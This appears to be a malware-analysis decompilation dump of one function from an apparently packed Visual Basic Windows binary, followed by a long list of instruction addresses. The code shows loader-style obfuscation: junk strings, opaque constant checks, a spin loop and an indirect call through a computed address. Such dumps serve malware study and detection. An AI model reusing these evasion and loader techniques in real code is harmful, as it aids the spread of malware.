				_v592 =  *0x4013f0;
				_t1136 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, _t1374, _t1374, _t399, 0x9d, 0x3b889c20, 0x5b06);
				_v596 = _t1136;
				if(_v596 >= 0) {
					_t408 =  &_v692;
					 *_t408 = _v692 & 0x00000000;
					__eflags =  *_t408;
				} else {
					_push(0x70c);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v692 = _t1136;
				}
				_v8 = 0x2a;
				 *((intOrPtr*)( *_a4 + 0x750))(_a4,  &_v584);
				_v140 = _v584;
				_v8 = 0x2b;
				_v556 = 0x1fe;
				_v584 =  *0x4013e8;
				 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x1d56,  &_v584,  &_v556,  &_v560);
				_v224 = _v560;
				_v8 = 0x2c;
				_v556 = 0x37b;
				_v564 =  *0x4013e0;
				_v632 =  *0x4013d8;
				_t432 =  &_v564; // 0x2329eb
				 *((intOrPtr*)( *_a4 + 0x758))(_a4, _t432, 0xdbe6dc20, 0x5af4,  &_v556, _t1374, _t1374);
				_v8 = 0x2d;
				_t1156 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
				_v596 = _t1156;
				if(_v596 >= 0) {
					_t446 =  &_v696;
					 *_t446 = _v696 & 0x00000000;
					__eflags =  *_t446;
				} else {
					_push(0x6fc);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v696 = _t1156;
				}
				_v192 = _v556;
				_v8 = 0x2e;
				_t1160 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v596 = _t1160;
				if(_v596 >= 0) {
					_t459 =  &_v700;
					 *_t459 = _v700 & 0x00000000;
					__eflags =  *_t459;
				} else {
					_push(0x6f8);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v700 = _t1160;
				}
				_v8 = 0x2f;
				L004018F4();
				 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x8904d3f8,  &_v312, 0x742e,  &_v584);
				_v220 = _v584;
				_t1376 =  &_v312;
				L00401924();
				_v8 = 0x30;
				_v564 = 0x8904d3f8;
				 *((intOrPtr*)( *_a4 + 0x740))(_a4,  &_v564, 0x98e72e79,  &_v584);
				_v212 = _v584;
				_v208 = _v580;
				_v8 = 0x31;
				_v584 =  *0x4013d0;
				_v708 =  *0x4013c8;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x3a20,  &_v584, _t1376,  &_v556);
				_v172 = _v556;
				_v8 = 0x32;
				_t1182 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v584);
				_v596 = _t1182;
				if(_v596 >= 0) {
					_t501 =  &_v704;
					 *_t501 = _v704 & 0x00000000;
					__eflags =  *_t501;
				} else {
					_push(0x710);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v704 = _t1182;
				}
				_v252 = _v584;
				_v248 = _v580;
				_v8 = 0x33;
				_v584 =  *0x4013c0;
				_t1189 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x98e72e79,  &_v584, 0x3457, 0x98e72e79,  &_v592);
				_v596 = _t1189;
				if(_v596 >= 0) {
					_t519 =  &_v708;
					 *_t519 = _v708 & 0x00000000;
					__eflags =  *_t519;
				} else {
					_push(0x708);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v708 = _t1189;
				}
				_v300 = _v592;
				_v296 = _v588;
				_v8 = 0x34;
				_v584 =  *0x4013b8;
				_v760 =  *0x4013b4;
				 *((intOrPtr*)( *_a4 + 0x754))(_a4, 0x2821,  &_v584, _t1376,  &_v556);
				_v168 = _v556;
				_v8 = 0x35;
				_v556 = 0x4ea1;
				_v564 = 0x8904d3f8;
				_t1203 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v564,  &_v556,  &_v568);
				_v596 = _t1203;
				if(_v596 >= 0) {
					_t548 =  &_v712;
					 *_t548 = _v712 & 0x00000000;
					__eflags =  *_t548;
				} else {
					_push(0x714);
					_push(0x4105e8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v712 = _t1203;
				}
				_v204 = _v568;
				_v8 = 0x36;
				L004018EE();
				_v8 = 0x37;
				_t1207 =  *((intOrPtr*)( *_a4 + 0x1b8))(_a4,  &_v556, 0xffffffff);
				asm("fclex");
				_v596 = _t1207;
				if(_v596 >= 0) {
					_t563 =  &_v716;
					 *_t563 = _v716 & 0x00000000;
					__eflags =  *_t563;
				} else {
					_push(0x1b8);
					_push(0x4105b8);
					_push(_a4);
					_push(_v596);
					L00401906();
					_v716 = _t1207;
				}
				_t1213 =  *((intOrPtr*)( *_a4 + 0x1bc))(_a4, 0);
				asm("fclex");
				_v600 = _t1213;
				if(_v600 >= 0) {
					_t574 =  &_v720;
					 *_t574 = _v720 & 0x00000000;
					__eflags =  *_t574;
				} else {
					_push(0x1bc);
					_push(0x4105b8);
					_push(_a4);
					_push(_v600);
					L00401906();
					_v720 = _t1213;
				}
				_v8 = 0x38;
				_v448 = _v448 & 0x00000000;
				_v444 = _v444 & 0x00000000;
				_v456 = 6;
				L004018E8();
				while(1) {
					_v8 = 0x3a;
					_v448 = 1;
					_v456 = 2;
					L004018E2();
					_t1378 =  &_v132;
					L004018E8();
					_v8 = 0x3b;
					_v556 = 0x1e2c;
					_v564 =  *0x4013b0;
					 *_t1443 =  *0x4013a8;
					 *((intOrPtr*)( *_a4 + 0x758))(_a4,  &_v564, 0x539a9640, 0x5af4,  &_v556, _t1378, _t1378,  &_v344,  &_v456,  &_v132);
					_v8 = 0x3c;
					_t1225 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v564);
					_v596 = _t1225;
					if(_v596 >= 0) {
						_t609 =  &_v724;
						 *_t609 = _v724 & 0x00000000;
						__eflags =  *_t609;
					} else {
						_push(0x704);
						_push(0x4105e8);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v724 = _t1225;
					}
					_v100 = _v564;
					_v8 = 0x3d;
					 *((intOrPtr*)( *_a4 + 0x738))(_a4);
					_v8 = 0x3e;
					_t1231 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
					_v596 = _t1231;
					if(_v596 >= 0) {
						_t626 =  &_v728;
						 *_t626 = _v728 & 0x00000000;
						__eflags =  *_t626;
					} else {
						_push(0x6f8);
						_push(0x4105e8);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v728 = _t1231;
					}
					_v8 = 0x3f;
					_v556 = 0x1854;
					_v584 =  *0x401458;
					 *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v584, 0xbb1ac,  &_v556,  &_v592);
					_v292 = _v592;
					_v8 = 0x40;
					_v556 = 0x5bd9;
					_v584 =  *0x401450;
					 *((intOrPtr*)( *_a4 + 0x73c))(_a4, 0x37b,  &_v584,  &_v556,  &_v560);
					_v284 = _v560;
					_v8 = 0x41;
					_t1248 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v556);
					_v596 = _t1248;
					if(_v596 >= 0) {
						_t660 =  &_v732;
						 *_t660 = _v732 & 0x00000000;
						__eflags =  *_t660;
					} else {
						_push(0x6fc);
						_push(0x4105e8);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v732 = _t1248;
					}
					_v280 = _v556;
					_v8 = 0x42;
					_t1253 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v564);
					_v596 = _t1253;
					if(_v596 >= 0) {
						_t674 =  &_v736;
						 *_t674 = _v736 & 0x00000000;
						__eflags =  *_t674;
					} else {
						_push(0x718);
						_push(0x4105e8);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v736 = _t1253;
					}
					_v232 = _v564;
					_v8 = 0x43;
					L004018F4();
					_v556 = 0x5b73;
					 *((intOrPtr*)( *_a4 + 0x72c))(_a4,  &_v556,  &_v312,  &_v584);
					_t1524 = _v584;
					_v48 = _t1524;
					L00401924();
					_v8 = 0x44;
					_v448 = 0x2ffff;
					_v456 = 0x8003;
					_push( &_v132);
					_t1261 =  &_v456;
					_push(_t1261);
					L004018DC();
					_t1262 = _t1261;
					if(_t1262 == 0) {
						break;
					}
				}
				_v8 = 0x47;
				_v448 = 0xe8;
				do {
					_t1262 = _t1262 + 1;
					__eflags = _t1262 - 0xfff9a646;
				} while (_t1262 != 0xfff9a646);
				 *_t1443(_t1262 + 0x46f11c);
				asm("movsb");
				L004018E8();
				_v8 = 0x48;
				_v572 = 0x8904d3f8;
				_v568 = 0x98e72e79;
				_v564 = 0x5f72a;
				_push(0x98e72e79);
				_push(L"bangsternears");
				_t1265 =  &_v320;
				_push(_t1265);
				L004018D6();
				_push(_t1265);
				_push( &_v572);
				_push( &_v568);
				_push( &_v564);
				_push(0x8310a4);
				_push(L"samtaleemnetsrhes");
				_t1269 =  &_v316;
				_push(_t1269);
				L004018D6();
				_push(_t1269);
				_push(L"Charcuterieganocephalantu");
				_t1270 =  &_v312;
				_push(_t1270);
				L004018D6();
				_push(_t1270);
				E004115F4();
				_v576 = _t1270;
				L004018D0();
				__eflags = _v576 - 0x8904d3f8;
				_v596 =  ~(0 | _v576 == 0x8904d3f8);
				_push( &_v320);
				_push( &_v316);
				_push( &_v312);
				_push(3);
				L004018CA();
				_t1444 = _t1443 + 0x10;
				__eflags = _v596;
				if(_v596 != 0) {
					_v8 = 0x49;
					_v8 = 0x4a;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v740 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v740 = 0x4183d8;
					}
					_v596 =  *_v740;
					_t1354 =  &_v344;
					L004018B2();
					_t1444 = _t1444 + 0x10;
					L004018B8();
					_t1355 =  &_v324;
					L004018BE();
					_t1358 =  *((intOrPtr*)( *_v596 + 0xc))(_v596, _t1355, _t1355, _t1354, _t1354, _t1354, _v164, L"M9uACtmJ7nAtSvje8kbN9w249", 0);
					asm("fclex");
					_v600 = _t1358;
					__eflags = _v600;
					if(_v600 >= 0) {
						_t733 =  &_v744;
						 *_t733 = _v744 & 0x00000000;
						__eflags =  *_t733;
					} else {
						_push(0xc);
						_push(0x411ad0);
						_push(_v596);
						_push(_v600);
						L00401906();
						_v744 = _t1358;
					}
					L004018AC();
					L00401912();
				}
				_v8 = 0x4c;
				_v564 = 0x792720;
				_t739 =  &_v564; // 0x792720
				_push(L"bangsternears");
				_t1279 =  &_v312;
				_push(_t1279);
				L004018D6();
				_push(_t1279);
				E0041165C();
				_v556 = _t1279;
				L004018D0();
				asm("sbb eax, eax");
				_v596 =  ~( ~(_v556 - 0x8904d3f8) + 1);
				L00401924();
				__eflags = _v596;
				if(_v596 != 0) {
					_v8 = 0x4d;
					_v8 = 0x4e;
					_v448 = L"rebslagerierneshand";
					_v456 = 8;
					_v480 = 0x6e5392;
					_v488 = 3;
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"EAuxmqjme0cZFWWnSnEvZMsikYtH2nYa25");
					_push(_v40);
					L004018FA();
					_t1444 = _t1444 + 0x2c;
				}
				_v8 = 0x50;
				_push(0x8904d3f8);
				_push(L"Statscheferstronhi8");
				_t1286 =  &_v316;
				_push(_t1286);
				L004018D6();
				_push(_t1286);
				_push(L"encryptions");
				_t1287 =  &_v312;
				_push(_t1287);
				L004018D6();
				_push(_t1287);
				_push(0x753eca);
				_push(0x3db7db);
				_push(0x8904d3f8);
				E0041169C();
				_v564 = _t1287;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				_v596 =  ~(0 | _v564 == 0x98e72e79);
				_push( &_v316);
				_push( &_v312);
				_push(2);
				L004018CA();
				_t1445 = _t1444 + 0xc;
				_t1293 = _v596;
				__eflags = _t1293;
				if(_t1293 != 0) {
					_v8 = 0x51;
					_v8 = 0x52;
					_push(0);
					_push(L"sykofanter");
					_push( &_v344);
					L00401918();
					_t1293 = 0x10;
					L004016F0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v264);
					L0040191E();
					L00401912();
				}
				_v8 = 0x54;
				_push(0x3a3aea);
				_push(0x8904d3f8);
				_push(0x98e72e79);
				_push(0x98e72e79);
				E004116EC();
				_v564 = _t1293;
				L004018D0();
				__eflags = _v564 - 0x404672;
				if(_v564 == 0x404672) {
					_v8 = 0x55;
					_v8 = 0x56;
					_v448 = L"rebslagerierneshand";
					_v456 = 8;
					L004018A0();
					_push(2);
					_t1293 =  &_v344;
					_push(_t1293);
					L004018A6();
					_v200 = _t1524;
					L00401912();
				}
				_v8 = 0x58;
				_push(0x350dde);
				_push(0x58e1c9);
				E0041173C();
				_v564 = _t1293;
				L004018D0();
				__eflags = _v564 - 0x5bdd58;
				if(_v564 == 0x5bdd58) {
					_v8 = 0x59;
					_v384 = 0x80020004;
					_v392 = 0xa;
					_v368 = 0x80020004;
					_v376 = 0xa;
					_v352 = 0x80020004;
					_v360 = 0xa;
					_v448 = L"Charcuterieganocephalantu";
					_v456 = 8;
					L004018A0();
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push(0);
					_push( &_v344);
					L0040189A();
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_t1293 =  &_v344;
					_push(_t1293);
					_push(4);
					L00401942();
					_t1445 = _t1445 + 0x14;
				}
				_v8 = 0x5b;
				L004018F4();
				_push(_t1293);
				_push( &_v316);
				L004018D6();
				_push(0x8904d3f8);
				_t1295 =  &_v316;
				_push(_t1295);
				E004117B0();
				_v564 = _t1295;
				L004018D0();
				__eflags = _v564 - 0x272878;
				_v596 =  ~(0 | _v564 == 0x00272878);
				_push( &_v316);
				_push( &_v312);
				_push(2);
				L004018CA();
				_t1301 = _v596;
				__eflags = _t1301;
				if(_t1301 != 0) {
					_v8 = 0x5c;
					_push(L"LAANELOFTERNE");
					L00401894();
				}
				_v8 = 0x5e;
				_push(0x8904d3f8);
				_push(0xd2930);
				E004117FC();
				_v564 = _t1301;
				L004018D0();
				__eflags = _v564 - 0x8904d3f8;
				if(_v564 == 0x8904d3f8) {
					_v8 = 0x5f;
					_v448 = L"samtaleemnetsrhes";
					_v456 = 8;
					L004018A0();
					_push( &_v344);
					L0040188E();
					L00401912();
				}
				_v8 = 0x61;
				_push(L"Gooiest4");
				_t1302 =  &_v312;
				_push(_t1302);
				L004018D6();
				_push(_t1302);
				_push(0x98e72e79);
				E00411840();
				_v564 = _t1302;
				L004018D0();
				__eflags = _v564 - 0x86be28;
				_v596 =  ~(0 | _v564 == 0x0086be28);
				L00401924();
				_t1306 = _v596;
				__eflags = _t1306;
				if(_t1306 != 0) {
					_v8 = 0x62;
					_v8 = 0x63;
					_v448 = L"Porto7";
					_v456 = 8;
					L004018A0();
					_push(2);
					_t1306 =  &_v344;
					_push(_t1306);
					L004018A6();
					_v160 = _t1524;
					L00401912();
				}
				_v8 = 0x65;
				_push(0x753f16);
				_push(0x98e72e79);
				_push(0x49db89);
				E00411884();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				if(_v564 == 0x98e72e79) {
					_v8 = 0x66;
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v748 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v748 = 0x4183d8;
					}
					_v596 =  *_v748;
					_t1338 =  &_v324;
					L004018BE();
					_t1306 =  *((intOrPtr*)( *_v596 + 0x10))(_v596, _t1338, _t1338, _a4);
					asm("fclex");
					_v600 = _t1306;
					__eflags = _v600;
					if(_v600 >= 0) {
						_t865 =  &_v752;
						 *_t865 = _v752 & 0x00000000;
						__eflags =  *_t865;
					} else {
						_push(0x10);
						_push(0x411ad0);
						_push(_v596);
						_push(_v600);
						L00401906();
						_v752 = _t1306;
					}
					L004018AC();
				}
				_v8 = 0x68;
				_push(0x2a551);
				_push(0x98e72e79);
				_push(0x8904d3f8);
				E004118CC();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x8904d3f8;
				if(_v564 == 0x8904d3f8) {
					_v8 = 0x69;
					_t1329 =  *((intOrPtr*)( *_a4 + 0x160))(_a4,  &_v324);
					asm("fclex");
					_v596 = _t1329;
					__eflags = _v596;
					if(_v596 >= 0) {
						_t881 =  &_v756;
						 *_t881 = _v756 & 0x00000000;
						__eflags =  *_t881;
					} else {
						_push(0x160);
						_push(0x4105b8);
						_push(_a4);
						_push(_v596);
						L00401906();
						_v756 = _t1329;
					}
					__eflags =  *0x4183d8;
					if( *0x4183d8 != 0) {
						_v760 = 0x4183d8;
					} else {
						_push(0x4183d8);
						_push(0x411ae0);
						L004018C4();
						_v760 = 0x4183d8;
					}
					_v600 =  *_v760;
					_v628 = _v324;
					_v324 = _v324 & 0x00000000;
					_t1333 =  &_v328;
					L00401888();
					_t1306 =  *((intOrPtr*)( *_v600 + 0x40))(_v600, _t1333, _t1333, _v628, L"incomprehensible");
					asm("fclex");
					_v604 = _t1306;
					__eflags = _v604;
					if(_v604 >= 0) {
						_t901 =  &_v764;
						 *_t901 = _v764 & 0x00000000;
						__eflags =  *_t901;
					} else {
						_push(0x40);
						_push(0x411ad0);
						_push(_v600);
						_push(_v604);
						L00401906();
						_v764 = _t1306;
					}
					L004018AC();
				}
				_v8 = 0x6b;
				_push(0x8904d3f8);
				E00411914();
				_v564 = _t1306;
				L004018D0();
				__eflags = _v564 - 0x98e72e79;
				if(_v564 == 0x98e72e79) {
					_v8 = 0x6c;
					_v8 = 0x6d;
					_v432 = 0x80020004;
					_v440 = 0xa;
					_v416 = 0x80020004;
					_v424 = 0xa;
					_v400 = 0x80020004;
					_v408 = 0xa;
					_v384 = 0x80020004;
					_v392 = 0xa;
					_v368 = 0x80020004;
					_v376 = 0xa;
					_v352 = 0x80020004;
					_v360 = 0xa;
					_v448 = L"samtaleemnetsrhes";
					_v456 = 8;
					L004018A0();
					_push( &_v440);
					_push( &_v424);
					_push( &_v408);
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push( &_v344);
					L0040187C();
					L00401882();
					_push( &_v440);
					_push( &_v424);
					_push( &_v408);
					_push( &_v392);
					_push( &_v376);
					_push( &_v360);
					_push( &_v344);
					_push(7);
					L00401942();
				}
				_v8 = 0x6f;
				_push(L"Gastriloquy");
				_t1307 =  &_v312;
				_push(_t1307);
				L004018D6();
				_push(_t1307);
				E00411970();
				_v564 = _t1307;
				L004018D0();
				__eflags = _v564 - 0x2ee60b;
				_v596 =  ~(0 | _v564 == 0x002ee60b);
				L00401924();
				_t1311 = _v596;
				__eflags = _t1311;
				if(__eflags != 0) {
					_v8 = 0x70;
					_v8 = 0x71;
					_push(0x1c);
					L00401876();
					_v144 = _t1311;
				}
				_v8 = 0x73;
				asm("fldz");
				L00401756();
				L0040193C();
				asm("fcomp qword [0x4013a0]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v8 = 0x74;
					L00401870();
				}
				_v20 = 0;
				asm("wait");
				_push(0x414a5b);
				L004018AC();
				L004018AC();
				L00401912();
				L00401912();
				L00401924();
				L004018AC();
				L004018AC();
				L004018AC();
				return _t1311;
			}




































































































































































































          0x004129b4
          0x004129b7
          0x004129c6
          0x004129d2
          0x004129da
          0x004129dd
          0x004129ea
          0x004129f3
          0x004129f6
          0x00412a05
          0x00412a08
          0x00412a0f
          0x00412a16
          0x00412a20
          0x00412a2a
          0x00412a34
          0x00412a3e
          0x00412a48
          0x00412a58
          0x00412a5f
          0x00412a66
          0x00412a67
          0x00412a6f
          0x00412a72
          0x00412a76
          0x00412a79
          0x00412a7d
          0x00412a80
          0x00412a85
          0x00412a91
          0x00412a98
          0x00412a9f
          0x00412aa0
          0x00412aa2
          0x00412aa7
          0x00412aaa
          0x00412ab1
          0x00412abb
          0x00412ac5
          0x00412acf
          0x00412ad9
          0x00412ad9
          0x00412ae0
          0x00412aea
          0x00412af4
          0x00412b04
          0x00412b0b
          0x00412b12
          0x00412b19
          0x00412b20
          0x00412b21
          0x00412b2c
          0x00412b2d
          0x00412b33
          0x00412b34
          0x00412b39
          0x00412b3a
          0x00412b3f
          0x00412b44
          0x00412b4a
          0x00412b4c
          0x00412b4d
          0x00412b5b
          0x00412b5b
          0x00412b5b
          0x00412b4f
          0x00412b4f
          0x00412b4f
          0x00412b6a
          0x00412b71
          0x00412b77
          0x00412b82
          0x00412b89
          0x00412b90
          0x00412b97
          0x00412b9e
          0x00412b9f
          0x00412ba1
          0x00412ba6
          0x00412ba9
          0x00412bb2
          0x00412bb4
          0x00412bbb
          0x00412bc2
          0x00412bc4
          0x00412bcf
          0x00412bd0
          0x00412bd7
          0x00412bd8
          0x00412be5
          0x00412be6
          0x00412be7
          0x00412be8
          0x00412be9
          0x00412beb
          0x00412bee
          0x00412bf3
          0x00412bf9
          0x00412bf9
          0x00412bfe
          0x00412c05
          0x00412c0a
          0x00412c13
          0x00412c15
          0x00412c26
          0x00412c2c
          0x00412c2e
          0x00412c34
          0x00412c3b
          0x00412c5d
          0x00412c5d
          0x00412c5d
          0x00412c3d
          0x00412c3d
          0x00412c42
          0x00412c47
          0x00412c4a
          0x00412c50
          0x00412c55
          0x00412c55
          0x00412c3b
          0x00412c64
          0x00412c6b
          0x00412c75
          0x00412c7f
          0x00412c89
          0x00412c99
          0x00412ca0
          0x00412ca1
          0x00412ca3
          0x00412ca4
          0x00412ca5
          0x00412ca8
          0x00412caa
          0x00412cab
          0x00412cac
          0x00412caf
          0x00412cb1
          0x00412cb2
          0x00412cb3
          0x00412cb6
          0x00412cbb
          0x00412cc0
          0x00412cc6
          0x00412cc8
          0x00412cc9
          0x00412cd7
          0x00412cd7
          0x00412cd7
          0x00412ccb
          0x00412ccb
          0x00412ccb
          0x00412ce6
          0x00412cf3
          0x00412cfa
          0x00412cfb
          0x00412cfd
          0x00412d02
          0x00412d0e
          0x00412d14
          0x00412d1b
          0x00412d25
          0x00412d2b
          0x00412d35
          0x00412d3f
          0x00412d49
          0x00412d53
          0x00412d5d
          0x00412d60
          0x00412d6d
          0x00412d6e
          0x00412d6f
          0x00412d70
          0x00412d71
          0x00412d74
          0x00412d81
          0x00412d82
          0x00412d83
          0x00412d84
          0x00412d85
          0x00412d88
          0x00412d95
          0x00412d96
          0x00412d97
          0x00412d98
          0x00412d99
          0x00412d9b
          0x00412da0
          0x00412da6
          0x00412dab
          0x00412dab
          0x00412dae
          0x00412dc4
          0x00412dca
          0x00412dd7
          0x00412df9
          0x00412df9
          0x00412df9
          0x00412dd9
          0x00412dd9
          0x00412dde
          0x00412de3
          0x00412de6
          0x00412dec
          0x00412df1
          0x00412df1
          0x00412e06
          0x00412e09
          0x00412e18
          0x00412e1e
          0x00412e25
          0x00412e4c
          0x00412e52
          0x00412e5f
          0x00412e8a
          0x00412e90
          0x00412e9d
          0x00412ebf
          0x00412ebf
          0x00412ebf
          0x00412e9f
          0x00412e9f
          0x00412ea4
          0x00412ea9
          0x00412eac
          0x00412eb2
          0x00412eb7
          0x00412eb7
          0x00412ecc
          0x00412ed5
          0x00412ed8
          0x00412ee5
          0x00412f10
          0x00412f16
          0x00412f23
          0x00412f45
          0x00412f45
          0x00412f45
          0x00412f25
          0x00412f25
          0x00412f2a
          0x00412f2f
          0x00412f32
          0x00412f38
          0x00412f3d
          0x00412f3d
          0x00412f52
          0x00412f5e
          0x00412f64
          0x00412f73
          0x00412f79
          0x00412f86
          0x00412fa8
          0x00412fa8
          0x00412fa8
          0x00412f88
          0x00412f88
          0x00412f8d
          0x00412f92
          0x00412f95
          0x00412f9b
          0x00412fa0
          0x00412fa0
          0x00412faf
          0x00412fb6
          0x00412fc5
          0x00412fed
          0x00412ff9
          0x00412ffc
          0x00413003
          0x00413012
          0x0041303a
          0x00413047
          0x0041304e
          0x00413064
          0x0041306a
          0x00413077
          0x00413099
          0x00413099
          0x00413099
          0x00413079
          0x00413079
          0x0041307e
          0x00413083
          0x00413086
          0x0041308c
          0x00413091
          0x00413091
          0x004130a7
          0x004130ae
          0x004130c4
          0x004130ca
          0x004130d7
          0x004130f9
          0x004130f9
          0x004130f9
          0x004130d9
          0x004130d9
          0x004130de
          0x004130e3
          0x004130e6
          0x004130ec
          0x004130f1
          0x004130f1
          0x00413106
          0x0041310c
          0x0041311e
          0x00413123
          0x00413149
          0x00413155
          0x0041315e
          0x00413163
          0x0041316a
          0x00413179
          0x004131a1
          0x004131ad
          0x004131b3
          0x004131c9
          0x004131d5
          0x004131db
          0x004131ea
          0x004131f0
          0x004131fd
          0x0041321f
          0x0041321f
          0x0041321f
          0x004131ff
          0x004131ff
          0x00413204
          0x00413209
          0x0041320c
          0x00413212
          0x00413217
          0x00413217
          0x00413226
          0x00413238
          0x0041325d
          0x00413269
          0x0041326c
          0x00413272
          0x00413277
          0x0041327e
          0x0041328e
          0x004132b4
          0x004132ba
          0x004132c9
          0x004132cf
          0x004132dc
          0x004132fe
          0x004132fe
          0x004132fe
          0x004132de
          0x004132de
          0x004132e3
          0x004132e8
          0x004132eb
          0x004132f1
          0x004132f6
          0x004132f6
          0x00413305
          0x0041330c
          0x00413328
          0x0041333a
          0x00413346
          0x00413352
          0x00413358
          0x0041335f
          0x00413387
          0x00413392
          0x00413398
          0x004133a5
          0x004133c7
          0x004133c7
          0x004133c7
          0x004133a7
          0x004133a7
          0x004133ac
          0x004133b1
          0x004133b4
          0x004133ba
          0x004133bf
          0x004133bf
          0x004133ce
          0x004133dd
          0x004133e3
          0x004133f0
          0x00413412
          0x00413412
          0x00413412
          0x004133f2
          0x004133f2
          0x004133f7
          0x004133fc
          0x004133ff
          0x00413405
          0x0041340a
          0x0041340a
          0x00413419
          0x00413420
          0x00413442
          0x00413448
          0x00413455
          0x00413469
          0x00413480
          0x0041348d
          0x00413494
          0x0041349b
          0x004134aa
          0x004134d2
          0x004134df
          0x004134e3
          0x004134f0
          0x00413504
          0x00413518
          0x00413525
          0x0041352c
          0x00413533
          0x00413558
          0x00413563
          0x00413569
          0x00413576
          0x00413598
          0x00413598
          0x00413598
          0x00413578
          0x00413578
          0x0041357d
          0x00413582
          0x00413585
          0x0041358b
          0x00413590
          0x00413590
          0x0041359f
          0x004135b4
          0x004135c1
          0x004135e3
          0x004135c3
          0x004135c3
          0x004135c8
          0x004135ce
          0x004135d0
          0x004135d6
          0x004135d6
          0x004135d8
          0x004135da
          0x004135e0
          0x004135e2
          0x004135e2
          0x004135ea
          0x004135f1
          0x00413600
          0x00413628
          0x00413635
          0x00413639
          0x00413640
          0x00413659
          0x00413668
          0x00413673
          0x00413679
          0x00413686
          0x004136a8
          0x004136a8
          0x004136a8
          0x00413688
          0x00413688
          0x0041368d
          0x00413692
          0x00413695
          0x0041369b
          0x004136a0
          0x004136a0
          0x004136af
          0x004136c5
          0x004136d1
          0x004136d7
          0x004136de
          0x004136ed
          0x00413715
          0x00413722
          0x00413729
          0x00413730
          0x0041373f
          0x0041374d
          0x00413761
          0x00413770
          0x00413776
          0x0041378c
          0x00413792
          0x0041379f
          0x004137c1
          0x004137c1
          0x004137c1
          0x004137a1
          0x004137a1
          0x004137a6
          0x004137ab
          0x004137ae
          0x004137b4
          0x004137b9
          0x004137b9
          0x004137cf
          0x004137d6
          0x004137e5
          0x004137eb
          0x004137f8
          0x0041381a
          0x0041381a
          0x0041381a
          0x004137fa
          0x004137fa
          0x004137ff
          0x00413804
          0x00413807
          0x0041380d
          0x00413812
          0x00413812
          0x00413821
          0x00413833
          0x00413858
          0x00413864
          0x0041386a
          0x00413870
          0x00413875
          0x0041387c
          0x004138a1
          0x004138ad
          0x004138b9
          0x004138bf
          0x004138cc
          0x004138e0
          0x004138f7
          0x00413904
          0x0041390b
          0x00413921
          0x00413927
          0x00413934
          0x00413956
          0x00413956
          0x00413956
          0x00413936
          0x00413936
          0x0041393b
          0x00413940
          0x00413943
          0x00413949
          0x0041394e
          0x0041394e
          0x00413963
          0x0041396f
          0x00413975
          0x00413982
          0x004139ad
          0x004139b3
          0x004139c0
          0x004139e2
          0x004139e2
          0x004139e2
          0x004139c2
          0x004139c2
          0x004139c7
          0x004139cc
          0x004139cf
          0x004139d5
          0x004139da
          0x004139da
          0x004139ef
          0x004139fb
          0x00413a01
          0x00413a0e
          0x00413a22
          0x00413a39
          0x00413a46
          0x00413a4d
          0x00413a54
          0x00413a5d
          0x00413a84
          0x00413a8a
          0x00413a97
          0x00413ab9
          0x00413ab9
          0x00413ab9
          0x00413a99
          0x00413a99
          0x00413a9e
          0x00413aa3
          0x00413aa6
          0x00413aac
          0x00413ab1
          0x00413ab1
          0x00413ac6
          0x00413acc
          0x00413ad5
          0x00413ada
          0x00413af0
          0x00413af6
          0x00413af8
          0x00413b05
          0x00413b27
          0x00413b27
          0x00413b27
          0x00413b07
          0x00413b07
          0x00413b0c
          0x00413b11
          0x00413b14
          0x00413b1a
          0x00413b1f
          0x00413b1f
          0x00413b43
          0x00413b49
          0x00413b4b
          0x00413b58
          0x00413b7a
          0x00413b7a
          0x00413b7a
          0x00413b5a
          0x00413b5a
          0x00413b5f
          0x00413b64
          0x00413b67
          0x00413b6d
          0x00413b72
          0x00413b72
          0x00413b81
          0x00413b88
          0x00413b8f
          0x00413b96
          0x00413ba9
          0x00413bae
          0x00413bae
          0x00413bb5
          0x00413bbf
          0x00413bdb
          0x00413be2
          0x00413be5
          0x00413bea
          0x00413bf1
          0x00413c00
          0x00413c0e
          0x00413c31
          0x00413c37
          0x00413c4d
          0x00413c53
          0x00413c60
          0x00413c82
          0x00413c82
          0x00413c82
          0x00413c62
          0x00413c62
          0x00413c67
          0x00413c6c
          0x00413c6f
